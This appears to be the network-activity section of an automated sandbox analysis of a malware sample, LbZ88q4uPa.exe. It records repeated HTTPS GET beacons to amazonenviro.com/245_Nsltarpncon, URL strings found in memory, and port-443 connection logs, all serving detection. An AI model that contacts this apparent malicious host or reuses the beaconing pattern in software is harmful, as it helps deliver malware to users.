            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficDNS traffic detected: DNS query: amazonenviro.com
            Source: LbZ88q4uPa.exe, 00000000.00000003.1704822504.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1786893756.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1721298684.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000002.2937308128.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2888515027.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2359917596.00000000006D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/
            Source: LbZ88q4uPa.exe, 00000000.00000003.1770560082.00000000006EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/(
            Source: LbZ88q4uPa.exe, 00000000.00000003.2359917596.00000000006D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com//
            Source: LbZ88q4uPa.exe, 00000000.00000002.2953251401.0000000020653000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Nsltarpncon
            Source: LbZ88q4uPa.exe, 00000000.00000003.1770742988.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1787030219.00000000006B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Nsltarpncon(zp
            Source: LbZ88q4uPa.exe, 00000000.00000003.2359917596.00000000006C1000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1770742988.00000000006C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Nsltarpncon)
            Source: LbZ88q4uPa.exe, 00000000.00000003.1721298684.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1704914093.00000000006B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Nsltarpncon.64.1.1
            Source: LbZ88q4uPa.exe, 00000000.00000003.2045905291.0000000021360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Nsltarpncon/
            Source: LbZ88q4uPa.exe, 00000000.00000003.2686960798.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1770742988.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2888515027.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1721298684.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2359917596.00000000006B4000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1704914093.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000002.2937308128.00000000006B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Nsltarpncon0
            Source: LbZ88q4uPa.exe, 00000000.00000003.2888515027.00000000006C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Nsltarpncon5
            Source: LbZ88q4uPa.exe, 00000000.00000002.2937308128.00000000006B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Nsltarpncon8i8
            Source: LbZ88q4uPa.exe, 00000000.00000003.2686960798.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000002.2937308128.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2359917596.00000000006D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Nsltarpncon?
            Source: LbZ88q4uPa.exe, 00000000.00000002.2937308128.00000000006F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_NsltarpnconF
            Source: LbZ88q4uPa.exe, 00000000.00000003.1770560082.00000000006F6000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1786893756.00000000006F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_NsltarpnconH
            Source: LbZ88q4uPa.exe, 00000000.00000002.2937308128.00000000006C7000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2888515027.00000000006C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_NsltarpnconL
            Source: LbZ88q4uPa.exe, 00000000.00000003.1770742988.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1721298684.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1704914093.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1787030219.00000000006B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_NsltarpnconM~.
            Source: LbZ88q4uPa.exe, 00000000.00000003.2686960798.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1949462184.00000000006F3000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2888515027.00000000006F3000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1704822504.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000002.2937308128.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1770560082.00000000006F6000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2359917596.00000000006D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_NsltarpnconP
            Source: LbZ88q4uPa.exe, 00000000.00000003.1721298684.00000000006C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_NsltarpnconV
            Source: LbZ88q4uPa.exe, 00000000.00000003.2359917596.00000000006C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_NsltarpnconW
            Source: LbZ88q4uPa.exe, 00000000.00000003.2686960798.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1770742988.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2888515027.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1721298684.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1704914093.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1787030219.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000002.2937308128.00000000006B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_NsltarpnconW~
            Source: LbZ88q4uPa.exe, 00000000.00000003.2888515027.00000000006F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Nsltarpnconb
            Source: LbZ88q4uPa.exe, 00000000.00000002.2937308128.00000000006C7000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2888515027.00000000006C7000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1770742988.00000000006C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Nsltarpnconc
            Source: LbZ88q4uPa.exe, 00000000.00000003.2888515027.00000000006F3000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1704822504.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1770560082.00000000006F6000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1721298684.00000000006F6000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1786893756.00000000006F6000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2359917596.00000000006D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Nsltarpnconc)
            Source: LbZ88q4uPa.exe, 00000000.00000002.2937308128.000000000063E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Nsltarpnconi
            Source: LbZ88q4uPa.exe, 00000000.00000003.2686960798.00000000006C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Nsltarpnconq
            Source: LbZ88q4uPa.exe, 00000000.00000003.1949462184.00000000006F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Nsltarpncony
            Source: LbZ88q4uPa.exe, 00000000.00000002.2937308128.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2359917596.00000000006D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/7
            Source: LbZ88q4uPa.exe, 00000000.00000003.1704822504.00000000006CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/8
            Source: LbZ88q4uPa.exe, 00000000.00000003.1770560082.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1786893756.00000000006EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/?
            Source: LbZ88q4uPa.exe, 00000000.00000003.1770560082.00000000006EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/G
            Source: LbZ88q4uPa.exe, 00000000.00000003.2686960798.00000000006EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/J
            Source: LbZ88q4uPa.exe, 00000000.00000003.1770560082.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2686960798.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1704822504.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1786893756.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1721298684.00000000006EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/O
            Source: LbZ88q4uPa.exe, 00000000.00000003.2359917596.00000000006D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/W
            Source: LbZ88q4uPa.exe, 00000000.00000003.1770560082.00000000006EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/X
            Source: LbZ88q4uPa.exe, 00000000.00000002.2937308128.00000000006EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/_
            Source: LbZ88q4uPa.exe, 00000000.00000002.2937308128.00000000006EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/g
            Source: LbZ88q4uPa.exe, 00000000.00000003.2888515027.00000000006EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/h
            Source: LbZ88q4uPa.exe, 00000000.00000003.1770560082.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1786893756.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2888515027.00000000006EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/o
            Source: LbZ88q4uPa.exe, 00000000.00000003.2686960798.00000000006EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/w
            Source: LbZ88q4uPa.exe, 00000000.00000002.2937308128.0000000000719000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2359840806.0000000000719000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2188951037.0000000021382000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2489960662.000000000070A000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2516597867.0000000000716000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2686960798.0000000000719000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2260288403.0000000021382000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2888515027.0000000000719000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.1949462184.0000000000705000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com:443/245_Nsltarpncon
            Source: LbZ88q4uPa.exe, 00000000.00000003.2516597867.0000000000716000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2686960798.0000000000719000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com:443/245_Nsltarpncon3
            Source: LbZ88q4uPa.exe, 00000000.00000003.2489960662.000000000070A000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2516597867.0000000000716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com:443/245_Nsltarpncon5zm
            Source: LbZ88q4uPa.exe, 00000000.00000002.2937308128.0000000000719000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2888515027.0000000000719000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com:443/245_NsltarpnconZZZZ:s
            Source: LbZ88q4uPa.exe, 00000000.00000003.2516597867.0000000000716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com:443/245_Nsltarpncon_
            Source: LbZ88q4uPa.exe, 00000000.00000003.1949462184.0000000000705000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com:443/245_Nsltarpnconclose
            Source: LbZ88q4uPa.exe, 00000000.00000003.1949462184.0000000000705000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com:443/245_Nsltarpnconerse
            Source: LbZ88q4uPa.exe, 00000000.00000002.2937308128.0000000000719000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2888515027.0000000000719000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com:443/245_Nsltarpnconiro.comhtep
            Source: LbZ88q4uPa.exe, 00000000.00000003.2359840806.0000000000719000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com:443/245_Nsltarpnconj
            Source: LbZ88q4uPa.exe, 00000000.00000003.2188951037.0000000021382000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000003.2260288403.0000000021382000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com:443/245_Nsltarpnconlg
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
            Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
            Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
            Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
            Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50147 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
            Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
            Source: unknownNetwork traffic detected: HTTP traffic on port 50142 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
            Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50153 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
            Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50139
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
            Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50138
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
            Source: unknownNetwork traffic detected: HTTP traffic on port 50149 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50131
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50130
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50133
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50132
            Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50135
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50134
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50137
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50136
            Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50140
            Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
